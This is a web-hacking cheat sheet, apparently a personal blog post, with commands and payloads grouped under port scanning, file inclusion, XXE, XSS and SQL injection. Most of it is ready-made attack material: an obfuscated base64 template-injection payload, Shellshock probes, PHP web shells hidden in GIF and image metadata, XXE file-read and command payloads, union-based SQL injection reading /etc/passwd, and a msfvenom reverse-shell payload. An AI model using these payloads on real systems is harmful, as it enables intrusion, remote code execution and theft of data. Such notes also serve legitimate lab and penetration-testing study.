Web

 April 4, 2021    Hacking

Table of contents:

• General
• Automation
• Network
  • Webserver
  • Man in the Middel Attack
  • Portscan
  • SSL/TLS
• Source code
• Files and Directories
  • Directory Fuzzer
  • Local File Inclusion
  • Remote File Inclusion
• Password
• Cookies
• IDS/IPS
• XSS
• SQL Injection
  • Output based Injection
  • Error based Injection
  • True Injection
  • Blind Injection
• Metasploit

General

• can´t reach host/website over IP? /etc/hosts

Automation

• nikto -h <website> web server scanner
• wapiti -u <website> web server scanner

Network

Man in the Middel Attack

• Ettercap Network Sniffing Tool
  • ettercap -G --> add IP as target --> Mitm menu
• Wireshark
  • http.request.url contains "login"

Webserver

• host files with python3 -m http.server
• make accessable on the internet ngrok http 8000

Portscan

• nmap <ip>
  • -sV Serviceversion
  • -O Operating system
  • -v verbose, shows more information about what it´s doing
  • -p 21 80-90 Test specific ports
  • nmap -vv --reason -Pn -A --osscan-guess --version-all -p -oN just does kind of everything
  • --script=<script name> run a script

SSL/TLS

• sslscan <website> obtains information and shows common misconfigurations like Heartbleed
• sslyze --regular <website> gives complimentary information
• openssl s_client -connect<website:443> shows SSL/TLS information

Source code

• look for hidden fields like input validation, codification or cyphring functions e.g. MAX-FILE-SIZE or FILEFORMAT-CHECK
  • OS Command Injection
• shell_exec curl file:\\localhost\..\..\flag
• shell_exec 127.0.0.1;uname -a
• nunjucks

  test@test.com {{range.constructor("return eval(Buffer('Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ2NkIC8gJiYgLi9yZWFkZmxhZycpLnRvU3RyaW5nKCk=','base64').toString())")()}}

• Shellshock: Bash Version befor September 2014
  • Remotetest curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://<ip>/cgi-bin/test.sh
  • Localtest x='() { :;}; echo VULNERABLE' bash -c :

Files and Directories

Directory Fuzzer

• <website>/robots.txt tells search engines to not index these directories
• OWAS ZAP Tools | Options | Forced Browse --> Attack | Forced Browse directory
• Burpsuite Proxy | Inteception --> Target | SItemap --> Spider | Control

Local File Inclusion

• Allows you to include files that exist in the target machine
• PHP Wrapper
  • ?page=expect://ls execution of system commands via the php expect wrapper
  • ?page=php://input your payload is sent in a POST request using curl

  • ?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

    base64 encoded

• POODLE vilnerability
  • nmap --script ssl-poodle-sV -p 443 <ip>
• Encoding
  • %2e%2e%2f is ../
  • %2e%2e/ is ../
  • ..%2f is ../
  • %2e%2e%5c is ..\
  • %2e%2e\ is ..\
  • ..%5c is ..\
  • %252e%252e%255c is ..\
  • ..%255c is ..\
  • ..%c0%af is ../
  • ..%c1%9c is ..\
• Null Bytes to terminate a filename
  • ?page=index.html%00.pdf Website sees a html file the OS a pdf file
• Absolute Path Traversal
  • example http://website.com/get.php?get=/var/www/html/site.php

Remote File Inclusion

• Rename shell.php.jpg passes the filter and the file is executed as php
• GIF89a;

  GIF89a;
  <?
  system($_GET['cmd']);//or you can insert your complete shell code
  ?>

• exiftool exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
• Magic byte
  • hexedit tacos.txt.jpg first bytes FFD8 FFDB
  • PNG 89 50 4E 47
  • ZIP 50 4B 03 04
  • PDF 25 50 44 46
• XML External Entity (XXE)
  • Remote Code Execution

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo
    [<!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "expect://id" >]>
    <creds>
    <user>`&xxe;`</user>
    <pass>`mypass`</pass>
    </creds>

  • Disclosing targeted files

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <foo>&xxe;</foo>

Password

• Profiling, retrieve a list of words used in the scanned application 'cewl -w -c -m 5 `
• Generate a dictionary john --stdout --wordlist=<cewlwordlist>
  • Generate with rules john --stdout --wordlist=<cewlwordlist> --rules > <output.txt>

Cookies

• Web-Speicher --> Cookies
• get Session cookie from webiste

  import requests
  r = requests.session()
  data = r.get(URI).text

• send Session cookie to webiste

  import requests
  cookies = {'enwiki_session': '17ab96bd8ffbe8ca58a78657a918558'}
  r = requests.post('http://wikipedia.org', cookies=cookies)

IDS/IPS

• Detection:
  • wafw00f <website>
  • nmap --script=http-waf-detect or http-waf-fingerprint identify a web application firewall

XSS

• Test<script>alert('XSS')</script>
• BeEF (Browser exploitation framework)
  • cd /user/share/beef-xss/ ./beef --> http://127.0.0.1:3000/ui/panel

SQL Injection

• SELECT select_list FROM table_name WHERE username = '' AND password =''
• Try to add debugging ?debug=1
• SQLMAP sqlmap -u "http://<website>?parameter=<parameter>
  • -- dbs Ausgabe der Datenbanken
  • -- tables -D mydb Ausgabe der Tabellen der Datenbank mydb
  • -- passwords Ausgabe von Passwort-Hashes mit anschließend möglichem Wörterbuchangriff
  • -- dump Erstellen eines Dumps der Datenbank-Tabellen
  • -b Ausgabe des DBMS-Banners
  • -h Ausgabe des help-files
  • -hh Liste aller Parameter und Parameter-Optionen

Output based Injection

• Test
  • 1 produces a valid response
  • 1' --> O/E and 1'' --> Response
  • <true parameter> and 1=1# --> O/E and <true parameter> and 1=1# --> Response (Comment in SQL and MySQL)
  • <true parameter> and 1=1-- --> O/E and <true parameter> and 1=1-- --> Response (Comment in SQL)
• Exploit
  • find name <true parameter> and name like a% if a% is valid you can continue with aa%
  • find number of colums <true parameter> order by 2-- if 2 is valid you have at least 2 colums
  • Number shows which colums can be used to display additional output <true parameter> union select 1,2,3,4<etc. as many colums> from <tablename># or without table name <true parameter> union select 1,2,3,4<etc.>#
  • database version <true parameter> union select 1,2,version(),4 from <tablename>#
  • database name <true parameter> union select 1,2,database(),4 from <tablename>#
  • current user <true parameter> union select 1,2,current_user(),4 from <tablename>#
  • information about tablename <true parameter> union select 1,2,table_name,4 from information_schema.tables where table_schema=database() #
• read the /etc/passwd file

  id=1%20and%201=2%20union%20select%20load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8%20from%20mysql.user--

Error based Injection

• Test
  • index.php?usr[] Warning: preg_match() expects parameter 2 to be string, array given
• Exploit
  • try to find usefull information in the error like filenames or methodes used.

True Injection

• 1' or 1=1 #

Blind Injection

• 1' --> no output and 1'' --> output
• 1' and '1' = '2 --> always false, no result and 1' and '1' = '1 --> always true if id 1 exists, result

Metasploit

• Msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > payload.exe